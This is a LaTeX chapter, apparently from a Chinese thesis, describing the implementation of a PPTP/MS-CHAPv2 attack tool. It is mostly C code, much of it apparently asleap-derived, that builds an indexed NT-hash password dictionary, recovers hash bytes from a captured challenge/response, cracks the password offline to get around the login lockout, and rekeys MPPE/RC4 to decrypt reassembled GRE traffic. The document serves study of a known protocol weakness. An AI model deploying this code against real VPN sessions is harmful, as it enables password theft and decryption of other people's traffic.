\chapter{软件实现}
\label{code}

\section{密码生成部分}
生成MD4密码字典，并根据MD4最后一个字节分类存放，最后一个字节相同的条目放在同一个中间文件中。
\begin{lstlisting}[language=C]
while (!feof(inputfl)) {

     fgets(password, MAX_NT_PASSWORD + 1, inputfl);
     /* Remove newline */
     password[strlen(password) - 1] = 0;

     /* Code to accommodate Windows-formatted dictionary files on Linux.
        Thanks ocnarfid8/#kismet.
     */
     if (password[strlen(password) - 1] == 0x0d) {
          password[strlen(password) - 1] = 0;
     }

     NtPasswordHash(password, strlen(password), pwhash);

     memcpy(rec.hash, pwhash, sizeof(rec.hash));
     rec.rec_size = (strlen(password) + sizeof(rec.hash)
                     + sizeof(rec.rec_size));

     /* Write the output record to the correct bucket, depending on byte
        14 of the hash value. */
     hsub = rec.hash[14];
     fwrite(&rec.rec_size, sizeof(rec.rec_size), 1,
            hbucket[hsub].sbucket);
     fwrite(password, strlen(password), 1, hbucket[hsub].sbucket);
     fwrite(&rec.hash, sizeof(rec.hash), 1, hbucket[hsub].sbucket);

     hbucket[hsub].numrec++;
     wordcount++;
}
\end{lstlisting}

对每一个小文件排序，并将排序好的小文件依次存放到dat文件中。
\begin{lstlisting}[language=C]
hsub = 0;
while (hsub < 256) {
     sprintf(bucketfile, "genk-bucket-%02x.tmp", hsub);

     /* If there are no records in the bucket, unlink */
     if (hbucket[hsub].numrec == 0) {
          /* Bucket is empty, get rid if it */
          fclose(hbucket[hsub].sbucket);
          hbucket[hsub].sbucket = NULL;
          unlink(bucketfile);
          hsub++;
          continue;
     }

/*
 * With all our buckets created, clean up and then sort each bucket.  After
 * Sorting the bucket, write the output file to the outputfl handle for one
 * big file.
 */

     /* malloc() enough space in memory for each record that we have to
        load into memory for sorting */
     if ((brec = calloc(hbucket[hsub].numrec, sizeof(rec))) == NULL) {
          fprintf(stderr,
                  "Unable to allocate %ld bytes of memory.  ",
                  (hbucket[hsub].numrec * sizeof(rec)));
          closebuckets(hbucket, 256);
          perror("malloc");
          exit(-1);
     }

     bucketrecords = hbucket[hsub].numrec;
     for (brecsub = 0; brecsub < bucketrecords; brecsub++) {

          /* Get 1 byte for the record length */
          if (fread(&brec[brecsub].rec_size, 1, 1,
                    hbucket[hsub].sbucket) != 1) {
               fprintf(stderr,
                       "Unable to read from bucket %02x. ",
                       hsub);
               perror("fread");
               closebuckets(hbucket, 256);
               exit(-1);
          }

          /* Calculate password length - 17 is hash+rec length byte */
          passlen = (brec[brecsub].rec_size - 17);

          /* malloc() memory for this password based on password length */
          if ((brec[brecsub].password =
               malloc(passlen + 1)) == NULL) {
               fprintf(stderr,
                       "Cannot allocate %d bytes of memory. ",
                       (passlen + 1));
               perror("malloc");
               closebuckets(hbucket, 256);
               exit(-1);
          }
          memset(brec[brecsub].password, 0, passlen + 1);

          /* Populate the password field with the next parameter in the 
             record */
          fread(brec[brecsub].password, passlen, 1,
                hbucket[hsub].sbucket);

          /* Populate the hash field with the final parameter in the record */
          fread(brec[brecsub].hash, 16, 1, hbucket[hsub].sbucket);
     }

     /* sort this bucket */
     qsort(brec, hbucket[hsub].numrec, sizeof(rec), compfunc);

     /* Write the sorted records to the outputfl handle */
     for (brecsub = 0; brecsub < bucketrecords; brecsub++) {
          passlen = brec[brecsub].rec_size - 17;
          fwrite(&brec[brecsub].rec_size, sizeof(rec.rec_size), 1,
                 outputfl);
          fwrite(brec[brecsub].password, passlen, 1, outputfl);
          fwrite(brec[brecsub].hash, sizeof(rec.hash), 1,
                 outputfl);
          free(brec[brecsub].password);
     }

     /* Get rid of the bucket */
     fclose(hbucket[hsub].sbucket);
     sprintf(bucketfile, "genk-bucket-%02x.tmp", hsub);
     remove(bucketfile);
     free(brec);

     hsub++;

}
\end{lstlisting}

以dat文件的最后两个字节作为索引，创建索引文件。类似于英汉词典中记录每一
个字母开始于哪一页，该索引文件记录的是特定的两个字符结尾的MD4串开始的位
置，如最后两个字节为"tQ"的串开始于文件的第20000字节。创建了这个文件之后，
可以大大缩小暴力破解时需要搜索的密码范围。
\begin{lstlisting}[language=C]
/* Re-open output file "r" */
if ((outputfl = fopen(datafile, "rb")) == NULL) {
     perror("fopen");
     fclose(outputfl);
     exit(1);
}

/* Create the index file - populate an initial record, then keep reading
 * through the file.  When the last 2 bytes of the hash change, write the
 * index record to the index file and keep reading records until EOF.
 */

recoffset = 0;
getnextret = 0;

/* Populate the initial index record from the outputfl */
if ((getnextret = getnextrec(&tmprec, outputfl, 0)) < 0) {
     perror("getnextrec");
     exit(-1);
}

memset(&idxrec, 0, sizeof(idxrec));
memset(&rec, 0, sizeof(rec));

/* Update the offset of the record, this is always 0 for the first record */
recoffset = recoffset + getnextret;

idxrec.hashkey[0] = tmprec.hash[14];
idxrec.hashkey[1] = tmprec.hash[15];
idxrec.offset = 0;
idxrec.numrec = 1;

while (!feof(outputfl)) {

     if ((getnextret = getnextrec(&rec, outputfl, 0)) < 0) {
          perror("getnextrec");
          exit(-1);
     }
     recoffset = recoffset + getnextret;

     if (idxrec.hashkey[0] != rec.hash[14] ||
         idxrec.hashkey[1] != rec.hash[15]) {

          /* Finished reading records for this hash key value.  Write the
             index record and populate the next index record. */
          if (fwrite(&idxrec, sizeof(idxrec), 1, outputidx) != 1) {
               perror("Error writing index record");
               fclose(outputfl);
               fclose(outputidx);
          }
          /*           fflush(outputidx);  */
          /*
            printf("DEBUG index record:\n");
            printf("idxrec.hashkey = %02x%02x\n", idxrec.hashkey[0], idxrec.hashkey[1]);
            printf("idxrec.offset = %llu\n", idxrec.offset);
            printf("idxrec.numrec = %llu\n", idxrec.numrec);
            printf("=======================\n");
          */

          /* Initialize struct for the next index entry set */
          memset(&idxrec, 0, sizeof(idxrec));

          /* Populate the next hash reference and offset */
          idxrec.hashkey[0] = rec.hash[14];
          idxrec.hashkey[1] = rec.hash[15];
          idxrec.offset = recoffset - getnextret;
          idxrec.numrec = 1;
          continue;

     } else {
          /* Got another record with the same hash value, increment count */
          idxrec.numrec++;
          continue;
     }
}

/* Write the final index record */
if (fwrite(&idxrec, sizeof(idxrec), 1, outputidx) != 1) {
     perror("Error writing final index record");
     fclose(outputfl);
     fclose(outputidx);
     exit(-1);
}

fclose(outputfl);
fclose(outputidx);
\end{lstlisting}

\section{暴力破解部分}

拨号时由于 PPTP 限定最多只有3次尝试机会，连续错误3次之后就会断开LCP创建
的底层连接。所以在得到用户名后不使用在线破解，而是根
据 chanllege 和 response 进行离线破解，这样可以最大地利用计算机的性能。

破解时先根据CHAPv2的弱点，用最多$2^{16}$次循环得到密码MD4之后的最后两个
字节。
\begin{lstlisting}[language=C]
int gethashlast2(struct asleap_data *asleap_ptr)
{

     int i;
     unsigned char zpwhash[7] = { 0, 0, 0, 0, 0, 0, 0 };
     unsigned char cipher[8];

     for (i = 0; i <= 0xffff; i++) {
          zpwhash[0] = i >> 8;
          zpwhash[1] = i & 0xff;

          DesEncrypt(asleap_ptr->challenge, zpwhash, cipher);
          if (memcmp(cipher, asleap_ptr->response + 16, 8) == 0) {
               /* Success in calculating the last 2 of the hash */
               /* debug - printf("%2x%2x\n", zpwhash[0], zpwhash[1]); */
               asleap_ptr->endofhash[0] = zpwhash[0];
               asleap_ptr->endofhash[1] = zpwhash[1];
               return 0;
          }
     }

     return (1);
}
\end{lstlisting}

再用这两个字节在索引文件中查出它在dat文件中开始的位置，然后在dat文件中
将这两个字节结尾的所有MD4用于破解，最终得到破解结果。
\begin{lstlisting}[language=C]
/* Brute-force all the matching NT hashes to discover the clear-text password */
int getmschappw(struct asleap_data *asleap_ptr)
{

     unsigned char zpwhash[16] = {
          0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
     };
     struct hashpass_rec rec;
     struct hashpassidx_rec idxrec;
     char password_buf[MAX_NT_PASSWORD];
     int passwordlen, i;
     FILE *buffp, *idxfp;

     /* If the user passed an index file for our reference, fseek to
        map the file and perform lookups based on indexed offsets.
        If there is no index file, perform a linear search. 
     */

     /* Use referenced index file for hash searches */

     memset(&idxrec, 0, sizeof(idxrec));

     if ((idxfp = fopen(asleap_ptr->dictidx, "rb")) == NULL) {
          perror("[getmschappw] Cannot open index file");
          return (-1);
     }

     /* Open the file with a buffered file handle */
     if ((buffp = fopen(asleap_ptr->dictfile, "rb")) == NULL) {
          perror("[getmschappw] fopen");
          fclose(idxfp);
          return (-1);
     }

     /* Read through the index file until we find the entry that matches
        our hash information */
     while (idxrec.hashkey[0] != asleap_ptr->endofhash[0] ||
            idxrec.hashkey[1] != asleap_ptr->endofhash[1]) {

          if (fread(&idxrec, sizeof(idxrec), 1, idxfp) != 1) {
               /* Unsuccessful fread, or EOF */
               /* printf("\tReached end of index file.\n"); */
               fclose(idxfp);
               fclose(buffp);
               return (0);
          }
     }

     /* The offset entry in the idxrec struct points to the first
        hash+pass record in the hash+pass file that matches our offset.  The
        idxrec struct also tells us how many entries we can read from the
        hash+pass file that match our hashkey information.  Collect records
        from the hash+pass file until we read through the number of records
        in idxrec.numrec */

     /* fseek to the correct offset in the file */
     if (fseeko(buffp, idxrec.offset, SEEK_SET) < 0) {
          perror("[getmschappw] fread");
          fclose(buffp);
          fclose(idxfp);
          return (-1);
     }

     for (i = 0; i < idxrec.numrec; i++) {

          memset(&rec, 0, sizeof(rec));
          memset(&password_buf, 0, sizeof(password_buf));
          fread(&rec.rec_size, sizeof(rec.rec_size), 1, buffp);

          /* The length of the password is the record size, 16 for the hash,
             1 for the record length byte. */
          passwordlen = rec.rec_size - 17;

          /* Check for corrupt data conditions, prevent segfault */
          if (passwordlen > MAX_NT_PASSWORD) {
               fprintf(stderr,
                       "Reported password length (%d) is longer than "
                       "the max password length (%d).\n",
                       passwordlen, MAX_NT_PASSWORD);
               return (-1);
          }

          /* Gather the clear-text password from the dict+hash file,
             then grab the 16 byte hash */
          fread(&password_buf, passwordlen, 1, buffp);
          fread(&zpwhash, sizeof(zpwhash), 1, buffp);

          /* Test the challenge and compare to our hash */
          if (testchal(asleap_ptr, zpwhash) == 0) {
               /* Found a matching password!  Store in the asleap_ptr struct */
               memcpy(asleap_ptr->nthash, zpwhash, 16);
               strncpy(asleap_ptr->password, password_buf,
                       strlen(password_buf));
               fclose(buffp);
               fclose(idxfp);
               /* success */
               return (1);
          }
     }

     /* Could not find a match - bummer */
     fclose(buffp);
     fclose(idxfp);

     return (0);
}
\end{lstlisting}

\section{密钥变换部分}
MPPE 使用的加密方式是 RC4，在每一个新的数据到来时，客户端都需要重新生成新数据包的解密密钥。
\begin{lstlisting}[language=C]
void mppe_rekey(struct MPPE *mppeInfo)
{
     byte InterimKey[16];       /* tmp var */
     /* The RC4 tables are initialized using the newly created interim key: */
     GetNewKeyFromSHA(mppeInfo->MasterKey, mppeInfo->SessionKey, 16, InterimKey);
     RC4_set_key(&(mppeInfo->RC4Key), 16, InterimKey);
    
     /* Then, the interim key is encrypted using the new tables to produce a new session key: */
     RC4(&(mppeInfo->RC4Key), 16, InterimKey, mppeInfo->SessionKey);
    
     /* Finally, the RC4 tables are re-initialized using the new session key: */
     RC4_set_key(&(mppeInfo->RC4Key), 16, mppeInfo->SessionKey);
}
\end{lstlisting}

\section{流重组部分}
在完整的 PPTP 通讯中从客户端到 PPTP 服务器的数据可能会乱序，重组可以使
用两种思路，第一种是用 TCP 首部的 seq 序号进行重组，第二种思路是用 PPP
首部的ccnt\footnote{coherent count}值。本程序使用ccnt值。解密之后的数据
包重组由调用程序处理。
\begin{lstlisting}[language=C]
void getGREpacket(struct Tunnel *tunnel, struct pptp_gre_header *header, int len, bool fromServer)
{
     static bool client_first = true, server_first = true;
    
     if (ntohs(header->protocol) != PPTP_GRE_PROTO || /* PPTP-GRE protocol for PPTP */
         PPTP_GRE_IS_C(header->flags) ||              /* flag C should be clear */
         PPTP_GRE_IS_R(header->flags) ||              /* flag R should be clear */
         !PPTP_GRE_IS_K(header->flags) ||             /* flag K should be set */
         (header->flags&0xF) != 0)                    /* routing and recursion ctrl = 0 */
          /* if invalid, discard this packet */
          return ;

     byte *payload = (byte*)header + sizeof(struct pptp_gre_header);
     int payloadlen = ntohs(header->payload_len);/* len - sizeof(struct pptp_gre_header); */
     int status = len - sizeof(struct pptp_gre_header);

     /* test if acknowledgement present */
     if (!PPTP_GRE_IS_A(header->ver)) {
          payload -= sizeof(header->ack);
          status += sizeof(header->ack);
     }/*  else { */
      /*      __u32 ack; */

      /*      /\* ack in different place if S = 0 *\/ */
      /*      ack = PPTP_GRE_IS_S(header->flags) ? header->ack : header->seq; */

      /*      ack = ntohl(ack); */

      /*      if (ack > opt->ack_recv) */
      /*           opt->ack_recv = ack; */
      /*      /\* also handle sequence number wrap-around  *\/ */
      /*      if (WRAPPED(ack, opt->ack_recv)) */
      /*           opt->ack_recv = ack; */
      /* } */
     /* test if payload present */
     if (!PPTP_GRE_IS_S(header->flags)) {
          return ;
     }
     if (status < payloadlen) {
          fprintf(stderr, "discarding truncated packet (expected %d, got %d bytes)\n",
                  payloadlen, status);
          return ;
     }

     /* get packet seq, re-order it by pqueue */
     u_int32_t seq = ntohl(header->seq);
     if (fromServer) {
          /* check for expected sequence number */
          if ( server_first || (seq == tunnel->opt.seq_server_recv + 1)) { /* wrap-around safe */
               LOG("accepting packet %d", seq);
               server_first = false;
               tunnel->opt.seq_server_recv = seq;
               copeGREpacket(tunnel, payload, payloadlen, fromServer);
               /* get buffered packet from queue, and decode by copeGREpakcet */
               dequeue_payload(tunnel, copeGREpacket, fromServer);

               /* out of order, check if the number is too low and discard the packet. 
                * (handle sequence number wrap-around, and try to do it right) */
          } else if ( seq < tunnel->opt.seq_server_recv + 1 ||
                      WRAPPED(tunnel->opt.seq_server_recv, seq) ) {
               LOG("discarding duplicate or old packet %d (expecting %d)",
                   seq, tunnel->opt.seq_server_recv + 1);
               /* sequence number too high, is it reasonably close? */
          } else if ( seq < tunnel->opt.seq_server_recv + MISSING_WINDOW ||
                      WRAPPED(seq, tunnel->opt.seq_server_recv + MISSING_WINDOW) ) {
               LOG("buffering packet %d (expecting %d, lost or reordered)",
                   seq, tunnel->opt.seq_server_recv+1);
               pqueue_add(&pq_server_head, &pq_server_tail, seq, payload, payloadlen);
               /* get buffered packet from queue, and decode by copeGREpakcet */
               dequeue_payload(tunnel, copeGREpacket, fromServer);
               /* no, packet must be discarded */
          }
     } else {
          /* check for expected sequence number */
          if ( client_first || (seq == tunnel->opt.seq_client_recv + 1)) { /* wrap-around safe */
               LOG("accepting packet %d", seq);
               client_first = false;
               tunnel->opt.seq_client_recv = seq;
               copeGREpacket(tunnel, payload, payloadlen, fromServer);
               /* get buffered packet from queue, and decode by copeGREpakcet */
               dequeue_payload(tunnel, copeGREpacket, fromServer);

               /* out of order, check if the number is too low and discard the packet. 
                * (handle sequence number wrap-around, and try to do it right) */
          } else if ( seq < tunnel->opt.seq_client_recv + 1 ||
                      WRAPPED(tunnel->opt.seq_client_recv, seq) ) {
               LOG("discarding duplicate or old packet %d (expecting %d)",
                   seq, tunnel->opt.seq_client_recv + 1);
               /* sequence number too high, is it reasonably close? */
          } else if ( seq < tunnel->opt.seq_client_recv + MISSING_WINDOW ||
                      WRAPPED(seq, tunnel->opt.seq_client_recv + MISSING_WINDOW) ) {
               LOG("buffering packet %d (expecting %d, lost or reordered)",
                   seq, tunnel->opt.seq_client_recv+1);
               pqueue_add(&pq_client_head, &pq_client_tail, seq, payload, payloadlen);
               /* get buffered packet from queue, and decode by copeGREpakcet */
               dequeue_payload(tunnel, copeGREpacket, fromServer);
               /* no, packet must be discarded */
          }
     }
}
\end{lstlisting}
